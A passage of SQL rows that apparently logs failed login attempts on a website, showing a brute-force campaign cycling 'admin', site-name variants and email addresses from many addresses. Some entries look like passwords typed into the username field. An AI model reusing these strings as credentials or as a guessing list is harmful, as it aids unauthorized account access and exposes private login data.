(8997, 32319, 1694031050.340156, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ´üqî', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8996, 32318, 1694031049.742607, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¾–’™', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8982, 32161, 1693727147.027768, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ†Ñüx', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),
(8981, 32160, 1693727145.864982, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ†Ñüx', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),
(8980, 32159, 1693727136.121358, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ†Ñüx', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),
(8979, 32158, 1693727135.728005, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ†Ñüx', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),
(8978, 32157, 1693727123.177577, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ†Ñüx', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),
(8977, 32156, 1693727122.869040, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ†Ñüx', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),
(8976, 32154, 1693727105.774084, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ†Ñüx', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),
(8975, 32153, 1693727105.602151, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ†Ñüx', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),
(8974, 32154, 1693727105.551036, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ†Ñüx', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),
(8973, 32153, 1693727105.300235, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ†Ñüx', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),
(8972, 32152, 1693723487.930600, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ†Ñüx', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),
(8971, 32151, 1693723487.527878, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ†Ñüx', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),
(8970, 32150, 1693723476.833370, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ†Ñüx', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),
(8969, 32149, 1693723473.837111, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ†Ñüx', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),
(8968, 32148, 1693723463.120229, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ†Ñüx', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),
(8967, 32147, 1693723461.126875, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ†Ñüx', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),
(8966, 32146, 1693723452.943634, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ†Ñüx', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),
(8965, 32145, 1693723450.324564, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ†Ñüx', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),
(8964, 32144, 1693723440.146443, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ†Ñüx', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),
(8963, 32143, 1693723438.353212, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ†Ñüx', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),
(8995, 32317, 1694031046.071155, 1, 'loginFailInvalidUsername', 'howequipmentworks', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿzf-B', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8994, 32316, 1694031043.028343, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿs*N,', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8993, 32315, 1694031041.410594, 1, 'loginFailInvalidUsername', 'happythinking.howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ1%L', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8992, 32314, 1694031039.174928, 1, 'loginFailInvalidUsername', 'happythinking!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ}¡Dñ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8991, 32313, 1694031035.420918, 1, 'loginFailInvalidUsername', 'howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¾ˆh¸', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8990, 32312, 1694031035.046942, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿm¡°r', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8989, 32311, 1694031030.932069, 1, 'loginFailInvalidUsername', 'howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿO%Ò', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8988, 32310, 1694031026.061485, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ§êÂ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8987, 32309, 1694031024.874637, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÈXÕã', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8986, 32308, 1694031022.023553, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ»Ç‚', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8985, 32307, 1694031021.698677, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ—-“m', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8984, 32306, 1694031018.539066, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ^9§÷', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8983, 32305, 1694031018.460669, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ»‰+³', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9207, 32978, 1694684960.315803, 1, 'loginFailInvalidUsername', 'happythinking@yahoo.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ)‹û6', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'),
(9206, 32977, 1694684955.000613, 1, 'loginFailInvalidUsername', 'happythinking@hanmail.net', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ<5 @', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36'),
(9205, 32976, 1694684951.819315, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ}¤\n±', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36'),
(9204, 32975, 1694684945.287197, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ10b.', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36'),
(9203, 32974, 1694684941.735033, 1, 'loginFailInvalidUsername', 'happythinking@hanmail.net', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿq¡‚', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'),
(9202, 32973, 1694684937.816893, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ=ØÊ', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36'),
(9201, 32972, 1694684931.463918, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ&„Â', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36'),
(9200, 32971, 1694684927.640187, 1, 'loginFailInvalidUsername', 'happythinking@yahoo.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ·¶tU', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15'),
(9199, 32970, 1694684923.873258, 1, 'loginFailInvalidUsername', 'admin@happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ:ºê¯', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36'),
(9198, 32969, 1694684919.270448, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿq a“', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063'),
(9197, 32968, 1694684915.711801, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ3ë¡ª', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36'),
(9196, 32967, 1694684911.945594, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ:E=j', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),
(9195, 32966, 1694684903.251058, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿuõÜš', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36'),
(9194, 32965, 1694684883.997904, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgyf', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'),
(9193, 32964, 1694684865.402604, 1, 'loginFailInvalidUsername', 'happythinking@hanmail.net', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ°ÊcO', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.76'),
(9192, 32963, 1694684859.475880, 1, 'loginFailInvalidUsername', 'study*201', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿf2ù•', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36'),
(9191, 32962, 1694684855.631006, 1, 'loginFailInvalidUsername', 'chloe18!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿf\0j', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36'),
(9190, 32961, 1694684850.755804, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿz´G', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'),
(9189, 32961, 1694684850.745920, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿz´G', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'),
(9188, 32960, 1694684844.208867, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ$SgC', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'),
(9187, 32959, 1694684838.671650, 1, 'loginFailInvalidUsername', 'admin123', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿwž', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36'),
(9186, 32958, 1694684835.152764, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿß²Ò,', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36'),
(9185, 32957, 1694684815.578043, 1, 'loginFailInvalidUsername', 'happythinking@gmail.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgO¬', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),
(9184, 32956, 1694684809.779887, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¾hym', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36'),
(9183, 32955, 1694684805.232152, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿz¡Kß', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36'),
(9182, 32954, 1694684793.884409, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¸RèÌ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 Edg/84.0.522.63'),
(9181, 32953, 1694684774.681692, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¶¸', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 Edg/84.0.522.63'),
(9180, 32952, 1694684769.914084, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ ¦â', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.76'),
(9179, 32951, 1694684754.012826, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÄÊ*¼', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.76'),
(9178, 32950, 1694684749.875266, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ11êœ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36'),
(9177, 32949, 1694684740.656110, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿq¡\\', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36'),
(9176, 32948, 1694684732.662301, 1, 'loginFailInvalidUsername', 'happythinking@gmail.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿªîÕn', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36'),
(9175, 32947, 1694684723.720897, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ|xnÊ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 Edg/84.0.522.63'),
(9174, 32946, 1694684719.943764, 1, 'loginFailInvalidUsername', '3ddaaade350b269e123!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÊ‰f', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36'),
(9173, 32945, 1694684714.584655, 1, 'loginFailInvalidUsername', 'happythinking@hanmail.net', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¯kïã', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),
(9172, 32944, 1694684708.565983, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿu>', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.76'),
(9171, 32943, 1694684703.715182, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¼\0Šm', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 Edg/84.0.522.63'),
(9170, 32942, 1694684697.909070, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ ³Ÿ', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36'),
(9169, 32941, 1694684695.345256, 1, 'loginFailInvalidUsername', 'happythinking1', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÅ%Ã', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'),
(9168, 32940, 1694684692.258475, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿiš Î', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.76'),
(9167, 32939, 1694684687.784414, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿg÷ü', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36'),
(9166, 32938, 1694684684.044693, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿg^©þ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36'),
(9165, 32937, 1694684678.721194, 1, 'loginFailInvalidUsername', 'happythinking@126.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ$KN»', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36'),
(9164, 32936, 1694684668.206406, 1, 'loginFailInvalidUsername', 'happythinking@verizon.net', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿg&Ì³', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'),
(9163, 32935, 1694684664.689470, 1, 'loginFailInvalidUsername', 'happythinking123!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿñê4', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15'),
(9162, 32934, 1694684660.649837, 1, 'loginFailInvalidUsername', 'chloe181!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgž’—', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36'),
(9161, 32933, 1694684654.864379, 1, 'loginFailInvalidUsername', 'happythinking@yahoo.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿjÈÕ¾', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15'),
(9160, 32932, 1694684650.419848, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ$@Ï', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36'),
(9159, 32931, 1694684645.410293, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgéX`', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36'),
(9158, 32930, 1694684640.675841, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgðó', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.76'),
(9157, 32929, 1694684636.183372, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿn,{', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063'),
(9156, 32928, 1694684631.828022, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿO‚ÌÄ', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),
(9155, 32927, 1694684625.410373, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-w‡k', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063'),
(9154, 32926, 1694684618.902816, 1, 'loginFailInvalidUsername', 'abceasyas123123', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿïÖ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36'),
(9153, 32926, 1694684618.893034, 1, 'loginFailInvalidUsername', 'abceasyas123123', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿïÖ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36'),
(9152, 32925, 1694684600.955907, 1, 'loginFailInvalidUsername', 'bluesky1211234!1!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÙ¥aö', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15'),
(9151, 32924, 1694684595.241561, 1, 'loginFailInvalidUsername', 'happythinking@gmail.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ·S×y', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'),
(9150, 32923, 1694684590.100499, 1, 'loginFailInvalidUsername', 'lovely1', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ$UmÝ', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),
(9149, 32922, 1694684585.941967, 1, 'loginFailInvalidUsername', 'study*201!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÏ>ª', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36'),
(9148, 32921, 1694684577.509757, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿsKµ~', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36'),
